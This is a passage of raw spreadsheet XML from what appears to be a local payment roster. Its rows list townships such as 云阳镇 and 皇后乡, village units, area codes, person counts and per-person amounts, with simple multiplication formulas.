        <f>F1732</f>
        <v>4113210521</v>
      </c>
      <c r="G1733" s="17"/>
      <c r="H1733" s="17"/>
      <c r="I1733" s="17"/>
      <c r="J1733" s="17"/>
      <c r="K1733" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1734" customHeight="1" spans="1:11">
      <c r="A1734" s="16" t="s">
        <v>4633</v>
      </c>
      <c r="B1734" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1734" s="17" t="s">
        <v>4610</v>
      </c>
      <c r="D1734" s="17" t="s">
        <v>4634</v>
      </c>
      <c r="E1734" s="17" t="s">
        <v>4545</v>
      </c>
      <c r="F1734" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1734" s="17">
        <v>1</v>
      </c>
      <c r="H1734" s="18">
        <v>365</v>
      </c>
      <c r="I1734" s="17">
        <f t="shared" ref="I1734:I1740" si="94">H1734*G1734</f>
        <v>365</v>
      </c>
      <c r="J1734" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1734" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1735" customHeight="1" spans="1:11">
      <c r="A1735" s="16" t="s">
        <v>4635</v>
      </c>
      <c r="B1735" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1735" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1735" s="17" t="s">
        <v>4636</v>
      </c>
      <c r="E1735" s="17" t="s">
        <v>4637</v>
      </c>
      <c r="F1735" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1735" s="17">
        <v>1</v>
      </c>
      <c r="H1735" s="18">
        <v>365</v>
      </c>
      <c r="I1735" s="17">
        <f t="shared" si="94"/>
        <v>365</v>
      </c>
      <c r="J1735" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K1735" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1736" customHeight="1" spans="1:11">
      <c r="A1736" s="16" t="s">
        <v>4638</v>
      </c>
      <c r="B1736" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1736" s="17" t="s">
        <v>4639</v>
      </c>
      <c r="D1736" s="17" t="s">
        <v>4640</v>
      </c>
      <c r="E1736" s="17" t="s">
        <v>1320</v>
      </c>
      <c r="F1736" s="17" t="s">
        <v>4641</v>
      </c>
      <c r="G1736" s="17">
        <v>1</v>
      </c>
      <c r="H1736" s="18">
        <v>365</v>
      </c>
      <c r="I1736" s="17">
        <f t="shared" si="94"/>
        <v>365</v>
      </c>
      <c r="J1736" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1736" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1737" customHeight="1" spans="1:11">
      <c r="A1737" s="16" t="s">
        <v>4643</v>
      </c>
      <c r="B1737" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1737" s="17" t="s">
        <v>4172</v>
      </c>
      <c r="D1737" s="17" t="s">
        <v>4644</v>
      </c>
      <c r="E1737" s="17" t="s">
        <v>4645</v>
      </c>
      <c r="F1737" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1737" s="17">
        <v>1</v>
      </c>
      <c r="H1737" s="18">
        <v>365</v>
      </c>
      <c r="I1737" s="17">
        <f t="shared" si="94"/>
        <v>365</v>
      </c>
      <c r="J1737" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1737" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1738" customHeight="1" spans="1:11">
      <c r="A1738" s="16" t="s">
        <v>4646</v>
      </c>
      <c r="B1738" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1738" s="17" t="s">
        <v>4647</v>
      </c>
      <c r="D1738" s="17" t="s">
        <v>4648</v>
      </c>
      <c r="E1738" s="17" t="s">
        <v>3583</v>
      </c>
      <c r="F1738" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1738" s="17">
        <v>1</v>
      </c>
      <c r="H1738" s="18">
        <v>365</v>
      </c>
      <c r="I1738" s="17">
        <f t="shared" si="94"/>
        <v>365</v>
      </c>
      <c r="J1738" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1738" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1739" customHeight="1" spans="1:11">
      <c r="A1739" s="16" t="s">
        <v>4649</v>
      </c>
      <c r="B1739" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1739" s="17" t="s">
        <v>4647</v>
      </c>
      <c r="D1739" s="17" t="s">
        <v>4650</v>
      </c>
      <c r="E1739" s="17" t="s">
        <v>3849</v>
      </c>
      <c r="F1739" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1739" s="17">
        <v>1</v>
      </c>
      <c r="H1739" s="18">
        <v>365</v>
      </c>
      <c r="I1739" s="17">
        <f t="shared" si="94"/>
        <v>365</v>
      </c>
      <c r="J1739" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1739" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1740" customHeight="1" spans="1:11">
      <c r="A1740" s="16" t="s">
        <v>4651</v>
      </c>
      <c r="B1740" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1740" s="17" t="s">
        <v>4647</v>
      </c>
      <c r="D1740" s="17" t="s">
        <v>4652</v>
      </c>
      <c r="E1740" s="17" t="s">
        <v>4653</v>
      </c>
      <c r="F1740" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1740" s="17">
        <v>2</v>
      </c>
      <c r="H1740" s="18">
        <v>325</v>
      </c>
      <c r="I1740" s="17">
        <f t="shared" si="94"/>
        <v>650</v>
      </c>
      <c r="J1740" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1740" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1741" customHeight="1" spans="1:11">
      <c r="A1741" s="16" t="s">
        <v>4654</v>
      </c>
      <c r="B1741" s="17" t="str">
        <f>B1740</f>
        <v>云阳镇</v>
      </c>
      <c r="C1741" s="17" t="str">
        <f>C1740</f>
        <v>南召店村袁庄组</v>
      </c>
      <c r="D1741" s="58" t="s">
        <v>4655</v>
      </c>
      <c r="E1741" s="58" t="s">
        <v>4656</v>
      </c>
      <c r="F1741" s="17" t="str">
        <f>F1740</f>
        <v>4113210519</v>
      </c>
      <c r="G1741" s="17"/>
      <c r="H1741" s="17"/>
      <c r="I1741" s="17"/>
      <c r="J1741" s="17"/>
      <c r="K1741" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1742" customHeight="1" spans="1:11">
      <c r="A1742" s="16" t="s">
        <v>4657</v>
      </c>
      <c r="B1742" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1742" s="17" t="s">
        <v>4610</v>
      </c>
      <c r="D1742" s="17" t="s">
        <v>4658</v>
      </c>
      <c r="E1742" s="17" t="s">
        <v>3799</v>
      </c>
      <c r="F1742" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1742" s="17">
        <v>1</v>
      </c>
      <c r="H1742" s="18">
        <v>365</v>
      </c>
      <c r="I1742" s="17">
        <f>H1742*G1742</f>
        <v>365</v>
      </c>
      <c r="J1742" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1742" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1743" customHeight="1" spans="1:11">
      <c r="A1743" s="16" t="s">
        <v>4659</v>
      </c>
      <c r="B1743" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1743" s="17" t="s">
        <v>4660</v>
      </c>
      <c r="D1743" s="17" t="s">
        <v>4661</v>
      </c>
      <c r="E1743" s="17" t="s">
        <v>1144</v>
      </c>
      <c r="F1743" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1743" s="17">
        <v>2</v>
      </c>
      <c r="H1743" s="18">
        <v>325</v>
      </c>
      <c r="I1743" s="17">
        <f>H1743*G1743</f>
        <v>650</v>
      </c>
      <c r="J1743" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K1743" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1744" customHeight="1" spans="1:11">
      <c r="A1744" s="16" t="s">
        <v>4662</v>
      </c>
      <c r="B1744" s="17" t="str">
        <f>B1743</f>
        <v>云阳镇</v>
      </c>
      <c r="C1744" s="17" t="str">
        <f>C1743</f>
        <v>小关居委会</v>
      </c>
      <c r="D1744" s="59" t="s">
        <v>4663</v>
      </c>
      <c r="E1744" s="60" t="s">
        <v>4664</v>
      </c>
      <c r="F1744" s="17" t="str">
        <f>F1743</f>
        <v>4113210521</v>
      </c>
      <c r="G1744" s="17"/>
      <c r="H1744" s="17"/>
      <c r="I1744" s="17"/>
      <c r="J1744" s="17"/>
      <c r="K1744" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1745" customHeight="1" spans="1:11">
      <c r="A1745" s="16" t="s">
        <v>4665</v>
      </c>
      <c r="B1745" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1745" s="17" t="s">
        <v>4625</v>
      </c>
      <c r="D1745" s="17" t="s">
        <v>4666</v>
      </c>
      <c r="E1745" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1745" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1745" s="17">
        <v>1</v>
      </c>
      <c r="H1745" s="18">
        <v>365</v>
      </c>
      <c r="I1745" s="17">
        <f>H1745*G1745</f>
        <v>365</v>
      </c>
      <c r="J1745" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K1745" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1746" customHeight="1" spans="1:11">
      <c r="A1746" s="16" t="s">
        <v>4668</v>
      </c>
      <c r="B1746" s="61" t="s">
        <v>3560</v>
      </c>
      <c r="C1746" s="61" t="s">
        <v>4625</v>
      </c>
      <c r="D1746" s="61" t="s">
        <v>4669</v>
      </c>
      <c r="E1746" s="61" t="s">
        <v>2572</v>
      </c>
      <c r="F1746" s="61" t="s">
        <v>3564</v>
      </c>
      <c r="G1746" s="61">
        <v>2</v>
      </c>
      <c r="H1746" s="62">
        <v>345</v>
      </c>
      <c r="I1746" s="61">
        <f>H1746*G1746</f>
        <v>690</v>
      </c>
      <c r="J1746" s="61" t="s">
        <v>4667</v>
      </c>
      <c r="K1746" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1747" customHeight="1" spans="1:11">
      <c r="A1747" s="16" t="s">
        <v>4670</v>
      </c>
      <c r="B1747" s="17" t="str">
        <f>B1746</f>
        <v>云阳镇</v>
      </c>
      <c r="C1747" s="17" t="str">
        <f>C1746</f>
        <v>小关居委会三组</v>
      </c>
      <c r="D1747" s="63" t="s">
        <v>4671</v>
      </c>
      <c r="E1747" s="63" t="s">
        <v>4672</v>
      </c>
      <c r="F1747" s="17" t="str">
        <f>F1746</f>
        <v>4113210521</v>
      </c>
      <c r="G1747" s="17"/>
      <c r="H1747" s="17"/>
      <c r="I1747" s="17"/>
      <c r="J1747" s="17"/>
      <c r="K1747" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1748" customHeight="1" spans="1:11">
      <c r="A1748" s="16" t="s">
        <v>4673</v>
      </c>
      <c r="B1748" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1748" s="17" t="s">
        <v>4674</v>
      </c>
      <c r="D1748" s="17" t="s">
        <v>4675</v>
      </c>
      <c r="E1748" s="17" t="s">
        <v>3651</v>
      </c>
      <c r="F1748" s="17" t="s">
        <v>4184</v>
      </c>
      <c r="G1748" s="17">
        <v>1</v>
      </c>
      <c r="H1748" s="18">
        <v>365</v>
      </c>
      <c r="I1748" s="17">
        <f>H1748*G1748</f>
        <v>365</v>
      </c>
      <c r="J1748" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K1748" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1749" customHeight="1" spans="1:11">
      <c r="A1749" s="16" t="s">
        <v>4676</v>
      </c>
      <c r="B1749" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1749" s="17" t="s">
        <v>4677</v>
      </c>
      <c r="D1749" s="17" t="s">
        <v>4678</v>
      </c>
      <c r="E1749" s="17" t="s">
        <v>3889</v>
      </c>
      <c r="F1749" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1749" s="17">
        <v>1</v>
      </c>
      <c r="H1749" s="18">
        <v>365</v>
      </c>
      <c r="I1749" s="17">
        <f>H1749*G1749</f>
        <v>365</v>
      </c>
      <c r="J1749" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K1749" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1750" customHeight="1" spans="1:11">
      <c r="A1750" s="16" t="s">
        <v>4679</v>
      </c>
      <c r="B1750" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1750" s="17" t="s">
        <v>4172</v>
      </c>
      <c r="D1750" s="17" t="s">
        <v>4680</v>
      </c>
      <c r="E1750" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1750" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1750" s="17">
        <v>1</v>
      </c>
      <c r="H1750" s="18">
        <v>365</v>
      </c>
      <c r="I1750" s="17">
        <f t="shared" ref="I1750:I1767" si="95">H1750*G1750</f>
        <v>365</v>
      </c>
      <c r="J1750" s="17" t="s">
        <v>4681</v>
      </c>
      <c r="K1750" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1751" customHeight="1" spans="1:11">
      <c r="A1751" s="16" t="s">
        <v>4682</v>
      </c>
      <c r="B1751" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1751" s="17" t="s">
        <v>4683</v>
      </c>
      <c r="D1751" s="17" t="s">
        <v>4684</v>
      </c>
      <c r="E1751" s="17" t="s">
        <v>4685</v>
      </c>
      <c r="F1751" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1751" s="17">
        <v>1</v>
      </c>
      <c r="H1751" s="18">
        <v>365</v>
      </c>
      <c r="I1751" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1751" s="17" t="s">
        <v>4681</v>
      </c>
      <c r="K1751" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1752" customHeight="1" spans="1:11">
      <c r="A1752" s="16" t="s">
        <v>4686</v>
      </c>
      <c r="B1752" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1752" s="17" t="s">
        <v>4172</v>
      </c>
      <c r="D1752" s="17" t="s">
        <v>4687</v>
      </c>
      <c r="E1752" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1752" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1752" s="17">
        <v>1</v>
      </c>
      <c r="H1752" s="18">
        <v>365</v>
      </c>
      <c r="I1752" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1752" s="17" t="s">
        <v>4688</v>
      </c>
      <c r="K1752" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1753" customHeight="1" spans="1:11">
      <c r="A1753" s="16" t="s">
        <v>4689</v>
      </c>
      <c r="B1753" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1753" s="17" t="s">
        <v>4690</v>
      </c>
      <c r="D1753" s="17" t="s">
        <v>4691</v>
      </c>
      <c r="E1753" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1753" s="17" t="s">
        <v>4692</v>
      </c>
      <c r="G1753" s="17">
        <v>1</v>
      </c>
      <c r="H1753" s="18">
        <v>365</v>
      </c>
      <c r="I1753" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1753" s="17" t="s">
        <v>4693</v>
      </c>
      <c r="K1753" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1754" customHeight="1" spans="1:11">
      <c r="A1754" s="16" t="s">
        <v>4694</v>
      </c>
      <c r="B1754" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1754" s="17" t="s">
        <v>4695</v>
      </c>
      <c r="D1754" s="17" t="s">
        <v>4696</v>
      </c>
      <c r="E1754" s="17" t="s">
        <v>3574</v>
      </c>
      <c r="F1754" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1754" s="17">
        <v>1</v>
      </c>
      <c r="H1754" s="18">
        <v>365</v>
      </c>
      <c r="I1754" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1754" s="29">
        <v>45474</v>
      </c>
      <c r="K1754" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1755" customHeight="1" spans="1:11">
      <c r="A1755" s="16" t="s">
        <v>4697</v>
      </c>
      <c r="B1755" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1755" s="63" t="s">
        <v>4172</v>
      </c>
      <c r="D1755" s="64" t="s">
        <v>4698</v>
      </c>
      <c r="E1755" s="64" t="s">
        <v>3597</v>
      </c>
      <c r="F1755" s="17" t="s">
        <v>4692</v>
      </c>
      <c r="G1755" s="17">
        <v>1</v>
      </c>
      <c r="H1755" s="18">
        <v>365</v>
      </c>
      <c r="I1755" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1755" s="63" t="s">
        <v>4699</v>
      </c>
      <c r="K1755" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1756" customHeight="1" spans="1:11">
      <c r="A1756" s="16" t="s">
        <v>4700</v>
      </c>
      <c r="B1756" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1756" s="65" t="s">
        <v>4701</v>
      </c>
      <c r="D1756" s="66" t="s">
        <v>4702</v>
      </c>
      <c r="E1756" s="67" t="s">
        <v>3682</v>
      </c>
      <c r="F1756" s="34" t="s">
        <v>3564</v>
      </c>
      <c r="G1756" s="17">
        <v>1</v>
      </c>
      <c r="H1756" s="18">
        <v>365</v>
      </c>
      <c r="I1756" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1756" s="63" t="s">
        <v>4699</v>
      </c>
      <c r="K1756" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1757" customHeight="1" spans="1:11">
      <c r="A1757" s="16" t="s">
        <v>4703</v>
      </c>
      <c r="B1757" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1757" s="68" t="s">
        <v>4704</v>
      </c>
      <c r="D1757" s="59" t="s">
        <v>4705</v>
      </c>
      <c r="E1757" s="59" t="s">
        <v>3833</v>
      </c>
      <c r="F1757" s="69" t="s">
        <v>3584</v>
      </c>
      <c r="G1757" s="17">
        <v>1</v>
      </c>
      <c r="H1757" s="18">
        <v>365</v>
      </c>
      <c r="I1757" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1757" s="70" t="s">
        <v>4699</v>
      </c>
      <c r="K1757" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1758" customHeight="1" spans="1:11">
      <c r="A1758" s="16" t="s">
        <v>4706</v>
      </c>
      <c r="B1758" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1758" s="68" t="s">
        <v>4677</v>
      </c>
      <c r="D1758" s="59" t="s">
        <v>4707</v>
      </c>
      <c r="E1758" s="59" t="s">
        <v>4708</v>
      </c>
      <c r="F1758" s="69" t="s">
        <v>3584</v>
      </c>
      <c r="G1758" s="17">
        <v>1</v>
      </c>
      <c r="H1758" s="18">
        <v>365</v>
      </c>
      <c r="I1758" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1758" s="63" t="s">
        <v>4709</v>
      </c>
      <c r="K1758" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1759" customHeight="1" spans="1:11">
      <c r="A1759" s="16" t="s">
        <v>4710</v>
      </c>
      <c r="B1759" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1759" s="68" t="s">
        <v>4711</v>
      </c>
      <c r="D1759" s="59" t="s">
        <v>4712</v>
      </c>
      <c r="E1759" s="59" t="s">
        <v>4713</v>
      </c>
      <c r="F1759" s="69" t="s">
        <v>4714</v>
      </c>
      <c r="G1759" s="17">
        <v>1</v>
      </c>
      <c r="H1759" s="18">
        <v>365</v>
      </c>
      <c r="I1759" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1759" s="63" t="s">
        <v>4709</v>
      </c>
      <c r="K1759" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1760" customHeight="1" spans="1:11">
      <c r="A1760" s="16" t="s">
        <v>4715</v>
      </c>
      <c r="B1760" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1760" s="68" t="s">
        <v>4647</v>
      </c>
      <c r="D1760" s="59" t="s">
        <v>4716</v>
      </c>
      <c r="E1760" s="59" t="s">
        <v>4717</v>
      </c>
      <c r="F1760" s="69" t="s">
        <v>3598</v>
      </c>
      <c r="G1760" s="17">
        <v>1</v>
      </c>
      <c r="H1760" s="18">
        <v>365</v>
      </c>
      <c r="I1760" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1760" s="63" t="s">
        <v>4709</v>
      </c>
      <c r="K1760" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1761" customHeight="1" spans="1:22">
      <c r="A1761" s="16" t="s">
        <v>4718</v>
      </c>
      <c r="B1761" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1761" s="17" t="s">
        <v>4677</v>
      </c>
      <c r="D1761" s="17" t="s">
        <v>4719</v>
      </c>
      <c r="E1761" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1761" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1761" s="17">
        <v>1</v>
      </c>
      <c r="H1761" s="18">
        <v>365</v>
      </c>
      <c r="I1761" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1761" s="29">
        <v>45474</v>
      </c>
      <c r="K1761" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1762" customHeight="1" spans="1:22">
      <c r="A1762" s="16" t="s">
        <v>4720</v>
      </c>
      <c r="B1762" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1762" s="17" t="s">
        <v>4721</v>
      </c>
      <c r="D1762" s="17" t="s">
        <v>4722</v>
      </c>
      <c r="E1762" s="17" t="s">
        <v>1986</v>
      </c>
      <c r="F1762" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1762" s="17">
        <v>1</v>
      </c>
      <c r="H1762" s="18">
        <v>365</v>
      </c>
      <c r="I1762" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1762" s="29">
        <v>45658</v>
      </c>
      <c r="K1762" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1763" customHeight="1" spans="1:22">
      <c r="A1763" s="16" t="s">
        <v>4723</v>
      </c>
      <c r="B1763" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1763" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1763" s="17" t="s">
        <v>4724</v>
      </c>
      <c r="E1763" s="17" t="s">
        <v>4317</v>
      </c>
      <c r="F1763" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1763" s="17">
        <v>1</v>
      </c>
      <c r="H1763" s="18">
        <v>365</v>
      </c>
      <c r="I1763" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1763" s="29">
        <v>45717</v>
      </c>
      <c r="K1763" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1763" s="4"/>
    </row>
    <row r="1764" customHeight="1" spans="1:22">
      <c r="A1764" s="16" t="s">
        <v>4725</v>
      </c>
      <c r="B1764" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1764" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1764" s="17" t="s">
        <v>4726</v>
      </c>
      <c r="E1764" s="17" t="s">
        <v>4727</v>
      </c>
      <c r="F1764" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1764" s="17">
        <v>1</v>
      </c>
      <c r="H1764" s="18">
        <v>365</v>
      </c>
      <c r="I1764" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1764" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1764" s="17" t="s">
        <v>225</v>
      </c>
      <c r="M1764" s="4"/>
      <c r="N1764" s="4"/>
      <c r="O1764" s="4"/>
      <c r="P1764" s="4"/>
      <c r="Q1764" s="4"/>
      <c r="R1764" s="4"/>
      <c r="S1764" s="4"/>
      <c r="T1764" s="4"/>
      <c r="U1764" s="4"/>
      <c r="V1764" s="4"/>
    </row>
    <row r="1765" s="4" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1765" s="16" t="s">
        <v>4728</v>
      </c>
      <c r="B1765" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1765" s="71" t="s">
        <v>4172</v>
      </c>
      <c r="D1765" s="72" t="s">
        <v>4729</v>
      </c>
      <c r="E1765" s="72" t="s">
        <v>3945</v>
      </c>
      <c r="F1765" s="69" t="s">
        <v>3598</v>
      </c>
      <c r="G1765" s="17">
        <v>1</v>
      </c>
      <c r="H1765" s="18">
        <v>365</v>
      </c>
      <c r="I1765" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1765" s="73" t="s">
        <v>3094</v>
      </c>
      <c r="K1765" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1765" s="6"/>
      <c r="M1765" s="6"/>
      <c r="N1765" s="6"/>
      <c r="O1765" s="6"/>
      <c r="P1765" s="6"/>
      <c r="Q1765" s="6"/>
      <c r="R1765" s="6"/>
      <c r="S1765" s="6"/>
      <c r="T1765" s="6"/>
      <c r="U1765" s="6"/>
      <c r="V1765" s="6"/>
    </row>
    <row r="1766" customHeight="1" spans="1:22">
      <c r="A1766" s="16" t="s">
        <v>4730</v>
      </c>
      <c r="B1766" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1766" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1766" s="17" t="s">
        <v>4731</v>
      </c>
      <c r="E1766" s="17" t="s">
        <v>4732</v>
      </c>
      <c r="F1766" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1766" s="17">
        <v>1</v>
      </c>
      <c r="H1766" s="18">
        <v>365</v>
      </c>
      <c r="I1766" s="17">
        <f t="shared" si="95"/>
        <v>365</v>
      </c>
      <c r="J1766" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1766" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1767" customHeight="1" spans="1:22">
      <c r="A1767" s="16" t="s">
        <v>4733</v>
      </c>
      <c r="B1767" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1767" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1767" s="17" t="s">
        <v>4735</v>
      </c>
      <c r="E1767" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F1767" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1767" s="17">
        <v>2</v>
      </c>
      <c r="H1767" s="18">
        <v>325</v>
      </c>
      <c r="I1767" s="17">
        <f t="shared" si="95"/>
        <v>650</v>
      </c>
      <c r="J1767" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1767" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1768" customHeight="1" spans="1:22">
      <c r="A1768" s="16" t="s">
        <v>4738</v>
      </c>
      <c r="B1768" s="17" t="str">
        <f>B1767</f>
        <v>皇后乡</v>
      </c>
      <c r="C1768" s="17" t="str">
        <f>C1767</f>
        <v>皇后乡</v>
      </c>
      <c r="D1768" s="16" t="s">
        <v>4739</v>
      </c>
      <c r="E1768" s="16" t="s">
        <v>4740</v>
      </c>
      <c r="F1768" s="17" t="str">
        <f>F1767</f>
        <v>4113210615</v>
      </c>
      <c r="G1768" s="17"/>
      <c r="H1768" s="17"/>
      <c r="I1768" s="17"/>
      <c r="J1768" s="17"/>
      <c r="K1768" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1769" customHeight="1" spans="1:22">
      <c r="A1769" s="16" t="s">
        <v>4741</v>
      </c>
      <c r="B1769" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1769" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1769" s="17" t="s">
        <v>4742</v>
      </c>
      <c r="E1769" s="17" t="s">
        <v>4743</v>
      </c>
      <c r="F1769" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1769" s="17">
        <v>1</v>
      </c>
      <c r="H1769" s="18">
        <v>365</v>
      </c>
      <c r="I1769" s="17">
        <f>H1769*G1769</f>
        <v>365</v>
      </c>
      <c r="J1769" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1769" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1770" customHeight="1" spans="1:22">
      <c r="A1770" s="16" t="s">
        <v>4744</v>
      </c>
      <c r="B1770" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1770" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1770" s="17" t="s">
        <v>4745</v>
      </c>
      <c r="E1770" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F1770" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1770" s="17">
        <v>2</v>
      </c>
      <c r="H1770" s="18">
        <v>325</v>
      </c>
      <c r="I1770" s="17">
        <f>H1770*G1770</f>
        <v>650</v>
      </c>
      <c r="J1770" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1770" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1771" customHeight="1" spans="1:22">
      <c r="A1771" s="16" t="s">
        <v>4746</v>
      </c>
      <c r="B1771" s="17" t="str">
        <f>B1770</f>
        <v>皇后乡</v>
      </c>
      <c r="C1771" s="17" t="str">
        <f>C1770</f>
        <v>皇后乡</v>
      </c>
